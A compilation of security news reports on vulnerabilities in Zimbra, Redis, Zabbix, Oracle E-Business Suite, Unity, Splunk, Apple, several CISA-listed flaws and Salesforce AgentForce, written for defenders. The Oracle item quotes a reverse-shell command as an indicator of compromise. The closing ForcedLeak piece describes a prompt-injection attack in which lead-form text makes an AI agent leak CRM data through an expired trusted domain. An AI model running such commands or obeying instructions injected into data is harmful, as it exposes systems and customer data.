Vulnerabilities News

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) have issued an urgent alert concerning an actively exploited zero-day vulnerability in the Zimbra Collaboration Suite (ZCS). The flaw, identified as CVE-2025-27915, is a cross-site scripting (XSS) vulnerability that impacts the ZCS Classic Web Client.   The security hole has already been weaponized in the wild, prompting CISA to add it to its Known Exploited Vulnerabilities (KEV) catalog and recommend immediate action from administrators.  Technical Details of CVE-2025-27915  The vulnerability arises due to insufficient sanitization of HTML content within iCalendar (ICS) invitation files when accessed via the Classic Web Client in Zimbra. Specifically, the flaw can be exploited when malicious JavaScript is embedded inside an ICS file’s ontoggle attribute. Once the malicious calendar invite is opened by a user, the script executes within the user’s session context — without requiring further interaction.  This execution gives the attacker the same level of access as the victim, effectively compromising the account. Post-exploitation activities can include modifying email filters, redirecting messages to attacker-controlled addresses, exfiltrating sensitive data, and performing other unauthorized actions as the user.  The Common Vulnerability Scoring System (CVSS) score for CVE-2025-27915 is 7.5, categorizing it as a high-severity issue.  Scope of Impact  All supported versions of Zimbra Collaboration Suite that use the Classic Web Client are affected. Because the exploit requires nothing more than viewing a crafted email or calendar invite, it lends itself to phishing-style attacks. This low barrier to execution increases the risk, especially within organizations that heavily rely on Zimbra for internal communication.  Although no specific ransomware groups have been publicly tied to the exploitation of CVE-2025-27915 as of now, its characteristics make it a strong candidate for targeted campaigns, particularly those relying on email vectors.  CISA’s Response and Recommendations  CISA has set a compliance deadline of October 28, 2025, for federal agencies to address this vulnerability. Their recommendations for mitigating risk include:  Review and apply vendor patches or temporary workarounds as soon as possible.  Follow the Cloud Security Technical Reference Architecture under Binding Operational Directive (BOD) 22-01, especially for cloud-hosted ZCS deployments.  If mitigations are not currently available, administrators should consider disabling the ZCS Classic Web Client or suspending use of affected Zimbra servers altogether until an official fix is provided.  CISA also advises organizations to monitor logs for unusual activity, particularly changes to email filters or signs of ICS file abuse. Any indication of compromise should be treated as a high-priority incident.  Vendor and Industry Response  Zimbra, developed by Synacor, has not released a public statement naming a specific patch at the time of CISA’s alert, though organizations are urged to keep up with vendor advisories. The lack of immediate fixes makes the mitigation guidance even more critical in the short term.  This vulnerability falls under the Common Weakness Enumeration (CWE-79), which relates to improper neutralization of input during web page generation (cross-site scripting). It’s one of the most commonly exploited flaws in web applications, particularly when used to hijack user sessions or perform unauthorized actions. 

Google has unveiled a new AI Vulnerability Reward Program (VRP), offering payouts of up to $30,000 for researchers who successfully identify and report security flaws in its AI products, including its flagship Gemini platform.  This new program is an evolution of Google’s earlier efforts to incentivize ethical hacking and vulnerability reporting, particularly after the expansion of its Abuse VRP in 2023. That earlier initiative, which integrated AI into the traditional vulnerability reward system, yielded promising results. Since its inception, over $430,000 has been awarded to researchers for findings related solely to AI products. The success of that effort, as acknowledged by Security Engineering Managers Jason Parsons and Zak Bennett, laid the groundwork for launching a more defined and comprehensive reward system focused exclusively on AI. Why the New Google AI VRP? Google admits that until now, the scope of AI-related bug reports was ambiguous. Researchers were unsure which types of issues qualified for rewards and where to report certain bugs. As a response, the company has created a standalone AI VRP, combining both security vulnerabilities and abuse issues under a single reward structure.  Parsons and Bennett noted that the lack of clarity was a key concern: “We’ve heard that the scope of AI rewards wasn’t always clear,” they said. The updated program addresses this by defining specific categories and aligning rewards based on impact, novelty, and product sensitivity.  What Counts as Vulnerability? The AI VRP outlines eight distinct categories, ranging from S1 to A6:  S1: Rogue Actions – Attacks that can alter a victim’s account or data with significant security consequences (up to $20,000).  S2: Sensitive Data Exfiltration – Leaks involving personal or sensitive data.  A1 to A6 – Cover scenarios such as phishing enablement, model theft, context manipulation, access control bypass, unauthorized product usage, and cross-user denial of service.  Depending on the severity and creativity of the report, bonuses can raise the total reward to $30,000.  What’s Not Covered? Google has made it clear that content-related issues, such as hallucinations, alignment problems, prompt injections, and jailbreaks, are not covered under the AI VRP. These issues, though acknowledged as important, require long-term analysis and model refinement, which doesn’t align with the structure of VRPs. Instead, Google urges users to report these issues using in-product feedback tools.  “We don’t believe a Vulnerability Reward Program is the right format for addressing content-related issues,” the company states, adding that such concerns need cross-disciplinary solutions involving model updates, content reviewers, and broader trend analysis.  Still, the company encourages users to continue submitting such feedback — just through the right channels.  Key AI Products in Scope Google has categorized its AI products into three tiers under the new VRP:  Flagship Tier: Includes high-profile tools like Google Search, Gemini Apps (across Web, Android, iOS), and core Google Workspace apps such as Gmail, Docs, Sheets, and Meet. These offer the highest payouts.  Standard Tier: Covers products like AI Studio, Jules, and non-core Workspace tools like NotebookLM and AppSheet.  Other Tier: Encompasses miscellaneous AI features in lesser-known or third-party products, often rewarded with credits instead of cash.  Notably, issues related to Vertex AI and gemini-cli remain under the jurisdiction of the Google Cloud VRP, not the AI VRP.  Reward Breakdown Here’s how payouts are structured:  Category  Flagship  Standard  Other  S1: Rogue Actions  $20,000  $15,000  $10,000  S2: Sensitive Data Exfiltration  $15,000  $15,000  $10,000  A1–A6  Ranges from $5,000 to $500  Credits in some cases    These figures can increase with multipliers for report quality and novelty. A truly innovative vulnerability report, particularly if it can hack Gemini or another flagship product, could earn up to the $30,000 maximum. 

Researchers have uncovered a 13-year-old critical remote-code-execution flaw in Redis that let attackers escape the product’s Lua sandbox and execute native code on the host, creating a straight line from a malicious script to complete system compromise. The bug, tracked as CVE-2025-49844 and nicknamed RediShell, carried a top severity score — 10.0 on the CVSS scale — and affected every Redis release the researchers tested. The vulnerability originated in a use-after-free defect that had lived in Redis source for roughly 13 years, researchers at Wiz said. An attacker with the ability to submit a Lua script — a capability that Redis supports by default — could trigger the flaw, break out of the embedded Lua interpreter and run arbitrary native code on the host. That sequence let attackers steal credentials, deploy malware or pivot to other cloud services by using stolen IAM tokens. Wiz quantified the exposure for cloud operators. The researchers found roughly 330,000 Redis instances exposed to the internet, about 60,000 without any authentication enabled, and a majority of cloud deployments running Redis as container images without security hardening. Those defaults, combined with the ubiquity of Redis for caching and session storage, meant defenders face a rapidly escalating attack surface. Attack flow mapped by researchers followed a familiar but dangerous pattern. An attacker could send a crafted Lua payload, exploit the use-after-free to escape the sandbox, establish a reverse shell, then harvest SSH keys, IAM tokens and certificates before moving laterally. The post-exploit phase could include installing cryptominers, exfiltrating sensitive keys or encrypting data for extortion. Because the exploit requires no prior authentication on many default installs, defenders cannot rely on account controls to blunt initial access. Redis developers moved quickly after responsible disclosure. The Redis project published a security advisory and released patched builds on Oct. 3; Wiz credited the Redis team for collaborating during the disclosure. Still, researchers urged organizations to treat any Redis instance that faces the internet — and many internal, unauthenticated instances — as high priority for patching given the exploitability and reach. Also read: New Malware ‘Redigo’ Detected, Exploits Redis Servers Mitigations followed three practical threads. First, upgrade Redis to the vendor’s patched version immediately and prioritize internet-facing hosts. Second, harden configurations by enabling authentication, remove or restrict Lua scripting where operations do not need it, run Redis under a non-root account and lock down container images. Third, apply network controls and monitoring. Place Redis behind firewalls or private VPCs, log and alert on unusual Lua execution, and hunt for newly written binaries or reverse-shell indicators on hosts that run Redis. The discovery also raised broader supply-chain and cloud governance questions. Wiz argued the root cause traced to an aging code path in a dependency that many cloud services implicitly trust; in practice that made Redis a risk multiplier across modern infrastructure. The research reinforced a recurring theme. Infrastructure components that handle high-value data and run with broad privileges represent attractive, high-impact targets for attackers. For CISO and security operations teams, the immediate calculus will hinge on exposure and posture. Teams that ran Redis in default container images without ACLs or put instances on public subnets faced the shortest window for action. Those with Redis isolated in private networks or wrapped behind robust WAF and network policy controls could buy time to stage careful patching and verification. Researchers also recommended rotating any credentials or tokens that Redis instances might have stored or exposed prior to patching. Wiz researchers said they would publish deeper technical analysis later and intentionally withheld exploit specifics to give defenders time to act. Meanwhile, the company invited organizations to use its threat-center queries to inventory and triage Redis instances. The discovery reminded cloud operators that decades-old code paths can still yield modern, high-severity breakouts — and that rapid, deterministic patching remains a first-line defense.

A security vulnerability has been identified in Zabbix Agent and Agent2 for Windows, potentially allowing local users to escalate their privileges to the SYSTEM level. Tracked as CVE-2025-27237, the flaw originates from the way these agents handle the OpenSSL configuration file on Windows systems.  Zabbix, a widely-used open-source network monitoring platform, deploys its agents with elevated privileges to collect system-level performance data. However, in certain versions of its Windows agents, the OpenSSL configuration file is loaded from a file path that can be modified by users without administrative permissions. This misconfiguration opens the door to local privilege escalation attacks.  Technical Overview of CVE-2025-27237  According to the official security advisory, versions 6.0.0 through 6.0.40, 7.0.0 through 7.0.17, 7.2.0 through 7.2.11, and 7.4.0 through 7.4.1 of Zabbix Agent and Agent2 for Windows are affected by this flaw. In these versions, the agent loads the OpenSSL configuration from a directory where low-privileged users can write or alter files. By tampering with this file, a malicious user could inject a malicious DLL, which gets executed the next time the Zabbix service or system is restarted.  When successfully exploited, the malicious code executes with SYSTEM privileges, effectively granting the attacker full control over the machine.  The issue, categorized under CVE-2025-27237, has been assigned a CVSS 4.0 score of 7.3, reflecting a high severity level. The scoring vector provided is:  CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N   Discovery and Response  The vulnerability was responsibly disclosed by security researcher himbeer. The Zabbix Support Team acknowledged the issue under internal reference ZBX-27061 and confirmed the vulnerability as a security defect. The resolution was classified as major and has been marked as fixed in subsequent updates.  The affected component, specifically tied to the OpenSSL configuration file handling, was reported under the Zabbix internal project “ZABBIX BUGS AND ISSUES.”  Patched Versions and Mitigation  Zabbix users running affected versions on Windows are strongly encouraged to upgrade to the fixed releases immediately. The patched versions that address CVE-2025-27237 are:  6.0.41  7.0.18  7.2.12  7.4.2  These updates correct the insecure file path behavior, ensuring that the OpenSSL configuration can no longer be modified by low-privilege users. After applying the update, it is crucial to restart the Zabbix Agent or Agent2 service to complete the remediation process.  Currently, no known workarounds exist for this vulnerability aside from applying the official patch.  Implications  While the flaw requires local access to exploit, its impact is considerable. By executing malicious code with SYSTEM-level privileges, an attacker could bypass user-level restrictions, install software, access sensitive data, and potentially use the compromised machine as a launchpad for lateral movement within a network.  Given Zabbix’s popularity in enterprise and infrastructure monitoring, systems relying on Windows-based agents are especially urged to take swift action. The widespread deployment of these agents with elevated privileges makes them high-value targets in environments where strict privilege separation is critical.  The vulnerability in Zabbix Agent and Agent2 for Windows stresses the importance of regularly auditing software configurations—especially when external dependencies like OpenSSL are involved.  Administrators should review their systems for affected versions, apply the latest patches without delay, and follow best practices to prevent unauthorized file access and modification.  For full technical details, affected version breakdowns, and update instructions, refer to the official Zabbix security advisory. 

Oracle has issued a security alert warning users of a zero-day vulnerability in its widely used Oracle E-Business Suite. Tracked as CVE-2025-61882, this flaw allows unauthenticated, remote attackers to execute arbitrary code on affected systems. The vulnerability carries a CVSS v3.1 base score of 9.8, making it one of the most critical threats to the platform to date.  What CVE-2025-61882 Targets  According to Oracle’s advisory, CVE-2025-61882 resides in the Concurrent Processing component of the E-Business Suite, specifically within the BI Publisher Integration. Exploitable via HTTP, the flaw does not require user credentials or interaction and can be executed over a network.  The risk matrix published with the alert shows that the attack vector is “Network,” with low complexity and no privileges needed. Successful exploitation results in a high impact on confidentiality, integrity, and availability. Oracle categorically states:  “This vulnerability is remotely exploitable without authentication… If successfully exploited, it may result in remote code execution.”  The vulnerability affects Oracle E-Business Suite versions 12.2.3 through 12.2.14. Oracle strongly urges all customers to apply the necessary security updates without delay.  Affected Versions, Patch Requirements, and Support Limitations  Before installing the patch that addresses CVE-2025-61882, users must ensure their systems have already applied the October 2023 Critical Patch Update (CPU). This earlier update is a prerequisite for applying the current fixes released in the October 2025 alert.  Oracle notes that only versions under Premier Support or Extended Support, as defined by its Lifetime Support Policy, will receive patches. Systems running out-of-support versions are not tested against this vulnerability and remain at risk, even if technically vulnerable.  The company’s guidance stresses:  “Oracle recommends that customers plan product upgrades to ensure that patches released through the Security Alert program are available for the versions they are currently running.”  Affected product and patch information is available through Oracle’s Patch Availability Document, which provides step-by-step installation instructions tailored to each supported version.  Detection, Indicators of Compromise, and Immediate Mitigation Steps  Oracle has included a comprehensive set of Indicators of Compromise (IOCs) to help organizations detect and respond to potential attacks involving CVE-2025-61882. The list includes suspicious IP addresses, observed shell commands, and SHA‑256 hashes of known exploit files.  Key Indicators of Compromise:  Suspicious IPs:  200[.]107[.]207[.]26  185[.]181[.]60[.]11  Malicious Command:  sh -c /bin/bash -i >& /dev/tcp// 0>&1  Associated File Hashes and Exploit Samples:  oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip  exp.py, server.py – each with associated SHA-256 hashes.  Additionally, a public detection method is now available on GitHub. This tool identifies outdated E-Business Suite instances by checking if the HTTP response contains the string “E-Business Suite Home Page” and if the Last-Modified header shows a timestamp before October 4, 2025 (Unix timestamp 1759602752). The method is strictly for defensive use and not designed as an exploit.  Oracle also reminds administrators that the protocol listing in the risk matrix (HTTP) implies all secure variants (such as HTTPS) are affected as well. For users, it is advised to update to supported versions, apply the October 2023 CPU if not already done, and immediately install the October 2025 patch. Meanwhile, monitoring systems for the listed IOCs can help detect and contain potential exploitation attempts already underway. 

A recently disclosed security vulnerability in Unity has prompted security updates and, in some cases, game removals across platforms like Steam. The issue affects Unity versions 2017.1 and later, spanning a wide range of games and applications released over the last several years. According to Unity, this Unity vulnerability impacts software built for Android, Windows, macOS, and Linux, and immediate action is recommended for developers to secure their projects.  The Unity vulnerability, which has been assigned a “High” severity rating in the Common Vulnerabilities and Exposures (CVE) system, was responsibly reported by a security researcher known as RyotaK. Unity’s Director of Community and Advocacy, Larry Hryb, confirmed that there is no current evidence of exploitation, nor have there been any reports of harm to users or data breaches.  “We have proactively provided fixes that address vulnerability, and they are already available to all developers,” said Hryb in an official statement posted on October 3.  The affected Unity versions include any editor release from 2017.1 onward. Given the platform’s extensive use across the gaming and application development ecosystem, especially on Android, Windows, and Linux, the scope of affected titles is significant. Developers have been urged to update their games using Unity’s latest patched releases or employ the newly released binary patcher tool provided by the company.  Game Studios Respond to the Unity Vulnerability  The gaming industry has already begun reacting. As reported by VGC, Obsidian Entertainment has temporarily pulled several of its titles, including Pentiment, Avowed, and Grounded 2, from online platforms as a precaution.   Other studios have opted to push emergency updates, particularly for live games still in development or frequently updated. Unity has provided specific guidance for various development scenarios:  Developers should download the patched Unity Editor version through Unity Hub or the Unity Download Archive before building or publishing.  Developers are advised to recompile using the patched Editor. If recompiling is not feasible, Unity’s patching tool can be applied to already-built applications.  However, Unity also warns that developers using tamper-proofing or anti-cheat mechanisms must rebuild their projects from source, as patching may conflict with these security features.  Platform-Specific Risk and Protections  While the Unity vulnerability affects all major desktop and mobile operating systems, its risk level varies. On Linux, the threat is considered lower than on Android or Windows. Still, Unity recommends all developers apply the patch regardless of perceived platform risk.  To bolster defense, several major tech firms have stepped in:  Google: Android’s built-in malware scanning features will offer additional protection for users, though Unity emphasizes that these measures do not replace the need for patching.  Microsoft: Defender has been updated to detect and block the Unity vulnerability on Windows.  Valve: Has committed to implementing further safeguards within the Steam client.  Meta: Implemented mitigations for apps running on Horizon OS to prevent exploitation.  Unity stated that platforms like iOS, Xbox, PlayStation, Nintendo Switch, and WebGL have shown no signs of being vulnerable. Nevertheless, developers targeting multiple platforms are encouraged to use the latest Unity version even on unaffected systems for consistency and safety.  Guidance for Developers and Users  Unity strongly advises developers to update, recompile, or patch their applications to minimize potential risks. For consumers, the recommendation is to enable automatic updates, use current antivirus software, and avoid downloading apps or games from untrusted sources.  Users of affected games and apps are not currently at risk, according to Unity. There have been no confirmed exploits or breaches, and the company, along with its partners, has acted quickly to limit any exposure.  To prevent similar issues in the future, Unity has pledged to enhance its Secure Software Development Lifecycle (SSDLC) by adopting new tools, penetration testing processes, and stricter internal guidelines. The company also maintains a Bug Bounty program through Bugcrowd, encouraging researchers to report any vulnerabilities responsibly.  For developers with specific questions or needs, Unity has opened discussions in the CVE Q&A forums, where technical documentation, remediation guides, and patching tools are available. 

Splunk has disclosed six critical security vulnerabilities impacting multiple versions of both Splunk Enterprise and Splunk Cloud Platform. These Splunk vulnerabilities, collectively highlighting serious weaknesses in Splunk’s web components, could allow attackers to execute unauthorized JavaScript code remotely, access sensitive information, and perform server-side request forgery (SSRF) attacks.   Key Cross-Site Scripting (XSS) Splunk Vulnerabilities  Among the most interesting vulnerabilities are two cross-site scripting (XSS) flaws that allow malicious JavaScript execution within user browsers. Notably, CVE-2025-20367 is a reflected XSS vulnerability located in the /app/search/table endpoint, carrying a CVSS score of 5.7. Low-privileged users, those without admin or power roles, can exploit this flaw by crafting malicious payloads via the dataset.command parameter. This attack vector can compromise other users’ sessions and potentially expose sensitive data.  Another related issue, CVE-2025-20368, involves stored XSS via missing field warning messages in Saved Search and Job Inspector features. Similarly, this vulnerability allows low-privileged users to inject malicious code, posing significant risks across affected versions.  Server-Side Request Forgery and Other Flaws  A particularly severe vulnerability is CVE-2025-20371, an unauthenticated blind SSRF flaw affecting Splunk Enterprise versions below 10.0.1, 9.4.4, 9.3.6, and 9.2.8, as well as various Splunk Cloud Platform versions. With a CVSS score of 7.5, this vulnerability allows attackers to coerce Splunk into making REST API calls on behalf of authenticated high-privilege users. However, successful exploitation depends on the enableSplunkWebClientNetloc setting being enabled (true) in the web.conf configuration, and typically requires phishing to trick the victim into initiating the request.  Additionally, a denial of service (DoS) vulnerability (CVE-2025-20370) has been identified where users with the change_authentication privilege can send multiple LDAP bind requests, overwhelming the server’s CPU and forcing a restart of the affected instance. This vulnerability holds a medium severity score of 4.9.  Further vulnerabilities include:  CVE-2025-20369: XML External Entity (XXE) injection through the dashboard label field, which can result in DoS attacks.  CVE-2025-20366: Improper access control in background job submissions allows low-privileged users to access sensitive search results by guessing unique search job IDs.  Third-Party Package Security Updates  Splunk also addressed multiple vulnerabilities arising from third-party packages used within Splunk Enterprise. Released on the same day, these updates affect versions 10.0.1, 9.4.4, 9.3.6, 9.2.8, and above. Key changes include:  Removal of vulnerable packages such as protobuf-java and webpack.  Upgrades of mongod to version 7.0.14 and curl to 8.14.1 to address multiple high-severity CVEs.  Patching of libxml2 against CVE-2025-32415.  Upgrading jackson-core to v2.15.0 and mongotools to 100.12.1.  These package updates directly address vulnerabilities that could be exploited for remote code execution or other malicious activities.  Mitigation and Patch Recommendations  Splunk strongly recommends upgrading affected instances to fixed versions to address the identified vulnerabilities:  Splunk Enterprise: Versions 10.0.1, 9.4.4, 9.3.6, 9.2.8 or higher.  Splunk Cloud Platform: Ongoing patching is actively managed by Splunk.  Where immediate upgrades are not feasible, some mitigations include:  Disabling Splunk Web to mitigate vulnerabilities dependent on its components.  Turning off the enableSplunkWebClientNetloc setting to reduce SSRF risk.  Removing high-privilege roles, such as change_authentication, to prevent DoS exploits.  No specific detection signatures currently exist for these vulnerabilities. 

Apple has rolled out a series of important security updates across multiple platforms, addressing a vulnerability affecting the system font parser. These Apple security updates cover iOS, iPadOS, macOS, visionOS, watchOS, and tvOS. The central issue targeted by these updates is an out-of-bounds write flaw in Apple’s font parser, tracked under the identifier CVE-2025-43400. This vulnerability could allow a maliciously crafted font to cause unexpected app termination or corrupt process memory on affected devices. While there have been no reported cases of active exploitation, security experts warn that such a flaw could be exploited in combination with other vulnerabilities to enable remote code execution. Apple Security Updates: Platforms Affected The security update was released for a wide range of Apple devices, including:  iOS 26.0.1 and iPadOS 26.0.1 for iPhone 11 and later models, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later.  iOS 18.7.1 and iPadOS 18.7.1 covering iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later.  macOS Tahoe 26.0.1, macOS Sequoia 15.7.1, and macOS Sonoma 14.8.1 for various Mac models.  visionOS 26.0.1 for Apple Vision Pro.  watchOS 26.0.2 for Apple Watch Series 6 and later.  tvOS 26.0.1 for Apple TV HD and Apple TV 4K models.  Details of the Apple Fix The vulnerability stems from insufficient bounds checking within the font parser component, which could be triggered by processing a specially crafted font file. The patch, delivered as part of the Apple security update on September 29, 2025, strengthens bounds checking to prevent out-of-bounds memory access and the resulting instability.  This fix is uniformly applied across all affected operating systems, ensuring consistent protection whether the user is on iOS, iPadOS, macOS, or visionOS. For watchOS and tvOS, updates were also issued, though no specific Common Vulnerabilities and Exposures (CVE) entries were published for these platforms in this update cycle.  Why The Update Matters Font parser vulnerabilities have historically posed serious security risks, as font files are often processed automatically by systems and applications, potentially providing a stealthy attack vector. By addressing this flaw promptly, Apple mitigates the risk of memory corruption attacks that could otherwise destabilize apps or lead to more severe security breaches.  Update Availability and Installation All of these updates became available simultaneously on September 29, 2025. Apple users who have automatic updates enabled will receive the patches without needing to intervene. Those managing updates manually should navigate to System Settings > General > Software Update on their devices to download and install the latest versions, including macOS Sequoia 15.7.1 and the respective iOS and iPadOS releases. Final Note Apple has not indicated any additional required user actions beyond applying the updates. As always, users are encouraged to stay current with Apple security updates to maintain optimal protection against vulnerabilities. This round of patches highlights the ongoing importance of timely software maintenance within the Apple ecosystem, especially for users of iOS, iPadOS, and macOS devices.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has expanded its Known Exploited Vulnerabilities (KEV) Catalog by adding five new security flaws that are confirmed to be under active exploitation.   The newly listed vulnerabilities, spanning critical systems such as databases, network operating systems, email gateways, and file transfer platforms, include CVE-2021-21311, CVE-2025-20352, CVE-2025-10035, CVE-2025-59689, and CVE-2025-32463.  Detailed Breakdown of the Five Vulnerabilities  CVE-2021-21311 – Adminer SSRF Vulnerability  First disclosed in early 2021, this Server-Side Request Forgery (SSRF) vulnerability affects Adminer versions from 4.0.0 to just before 4.7.9. Adminer, a lightweight PHP-based database management tool, is vulnerable to manipulation of URL parameters that can result in unauthorized internal resource access.   With a CVSS score of 7.2, this issue is categorized as high severity. Attackers exploiting this flaw could use Adminer to proxy requests to otherwise inaccessible systems, potentially enabling lateral movement or reconnaissance within internal networks.  CVE-2025-20352 – Cisco IOS / IOS XE Stack-Based Buffer Overflow  This newly disclosed vulnerability in Cisco’s IOS and IOS XE operating systems affects multiple versions supporting the Simple Network Management Protocol (SNMP). Identified as a stack-based buffer overflow, the flaw can be triggered by an attacker sending specially crafted SNMP packets. Depending on the attacker’s privileges, the result can range from a simple denial of service to full remote code execution as the root user. With a CVSS score of 7.7, this vulnerability poses a substantial threat to enterprise and government network infrastructure.  CVE-2025-10035 – GoAnywhere MFT Deserialization Vulnerability  Affecting GoAnywhere MFT versions 0 through 7.8.3, this critical flaw (CVSS 10.0) lies in the application’s handling of serialized data in its License Servlet. Malicious actors can exploit this deserialization weakness to execute arbitrary commands, making it a prime target for attackers seeking to compromise sensitive file transfer systems. Fortra, the vendor, urges users to apply patches immediately and reinforce input validation mechanisms.  CVE-2025-59689 – Libraesva Email Gateway Command Injection  This vulnerability, found in multiple versions of Libraesva’s Email Security Gateway (ESG), allows attackers to inject and execute shell commands via improperly sanitized email attachments.   While rated medium severity (CVSS 6.1), its presence in a security appliance that handles inbound and outbound email traffic makes it a valuable entry point for attackers. Successful exploitation can result in system compromise and potential internal access.  CVE-2025-32463 – Sudo Privilege Escalation via Untrusted Control Sphere  Sudo, a core utility in Unix and Linux systems, is vulnerable in versions from 1.9.14 to 1.9.17p1. The vulnerability stems from unsafe handling of external control functionality, particularly involving /etc/nsswitch.conf in chroot environments. With a critical CVSS rating of 9.3, exploitation could grant an unprivileged user root-level access.  Why Inclusion in the KEV Catalog Matters  The addition of these vulnerabilities, CVE-2021-21311, CVE-2025-20352, CVE-2025-10035, CVE-2025-59689, and CVE-2025-32463, signals that each is confirmed to be actively exploited.   CISA’s KEV list is not theoretical; it reflects real-world threats, often leveraged by threat actors in advanced persistent campaigns or ransomware operations. The catalog acts as a call to action, urging organizations to remediate vulnerabilities that attackers are known to be using right now.  Affected Products and Versions  Cisco IOS/IOS XE – Over 349 IOS XE versions and 21 Catalyst SD-WAN releases are affected by CVE-2025-20352.  Fortra GoAnywhere MFT – All versions up to 7.8.3 are impacted by CVE-2025-10035.  Libraesva ESG – Multiple branches from 4.5 to 5.5 are vulnerable to CVE-2025-59689.  Sudo – Versions from 1.9.14 to before 1.9.17p1 are affected by CVE-2025-32463.  Adminer – Versions up to 4.7.8 require upgrading to at least 4.7.9 to address CVE-2021-21311.  Mitigation and Response Strategies  CISA advises organizations to:  Apply available patches as soon as vendor updates are released.  Implement compensating controls where patching is not immediately feasible, such as access restrictions, input validation, and segmentation.  Enhance monitoring and detection for signs of exploitation attempts, such as suspicious SNMP traffic, unusual command execution, or unexpected Adminer behavior.  Conduct threat hunting activities focusing on privilege escalation attempts or anomalous file transfer activity. 

A recently disclosed security research report has revealed a severe vulnerability chain in Salesforce AgentForce, dubbed ForcedLeak, which highlights a new class of AI-specific threats in enterprise systems.   The vulnerability, discovered by a cybersecurity firm and rated critical with a CVSS score of 9.4, exposes how the expanded attack surface of autonomous AI agents like those in AgentForce can be exploited through indirect prompt injection attacks.  Overview of the Salesforce ForcedLeak Vulnerability ForcedLeak targets Salesforce AgentForce, a CRM-integrated AI agent platform that autonomously handles complex business tasks such as lead management and customer communication. The core of the vulnerability lies in how AI agents process external inputs, not just as static data but as dynamic, executable instructions. Unlike traditional chatbot systems, AI agents with autonomous reasoning, internal memory, and tool-calling abilities present significantly broader attack surfaces.  Noma Labs found that attackers could inject malicious instructions into Salesforce’s Web-to-Lead form submissions. When internal employees later queried AgentForce about these leads, the AI would process the embedded payloads unknowingly, effectively turning trusted data into an attack vector. The flaw allowed for unauthorized access to sensitive CRM data, including customer contacts, sales strategies, and even third-party integration information.  Attack Methodology and Technical Details The researchers mapped out a multi-phase attack that involved:  Injection Point Identification: The “Description” field in Salesforce’s Web-to-Lead forms, with its 42,000-character limit, was identified as an ideal target for payload insertion.  Realistic Prompt Construction: The attacker crafted lead data that, when reviewed by employees using AgentForce, would cause the AI to execute embedded malicious instructions.  Prompt Injection via Trusted Queries: A prompt like “Please, check the lead with name ‘Alice Bob’ and answer their questions…” would seem innocuous, but would trigger the AI to parse and act upon malicious instructions in the data.  CSP Bypass via Expired Whitelisted Domain: Salesforce’s Content Security Policy (CSP) allowed outbound data transmission to certain whitelisted domains. One such domain, my-salesforce-cms.com, had expired and was purchased by researchers to demonstrate how data could be exfiltrated through a seemingly trusted channel.  This combination of factors created a high-impact vulnerability chain, ultimately proving how Salesforce AgentForce could be manipulated to leak sensitive CRM data with no direct user interaction.  Who Was at Risk? Any organization using Salesforce AgentForce with Web-to-Lead functionality, particularly in sales, marketing, and customer acquisition, was potentially at risk. These environments routinely ingest external data from forms filled out by prospects at conferences, marketing campaigns, or websites, providing fertile ground for malicious submissions.  Business and Security Impact The implications of ForcedLeak are significant:  Data Exposure: Customer information, internal communications, sales pipeline details, and historical CRM records were all potentially vulnerable.  Regulatory Risks: Breach disclosure requirements and compliance violations could follow such exposures.  Reputational Damage: Any confirmed data breach involving sensitive customer data could severely impact brand trust.  Lateral Movement: Due to Salesforce’s extensive API and business system integrations, attackers could potentially pivot across internal systems once inside.  The research also revealed the possibility of time-delayed execution, where payloads remain dormant until triggered by a future employee action, making detection and response far more difficult.  Salesforce’s Response Here is a timeline of events: July 28, 2025: Noma Labs reported the vulnerability to Salesforce.  July 31, 2025: Salesforce acknowledged the issue and began an investigation.  September 8, 2025: Salesforce released a patch implementing Trusted URLs Enforcement for both AgentForce and Einstein AI.  September 25, 2025: Public disclosure of vulnerability.  Salesforce also secured the expired domain from the whitelist and strengthened its CSP policies to prevent similar bypasses.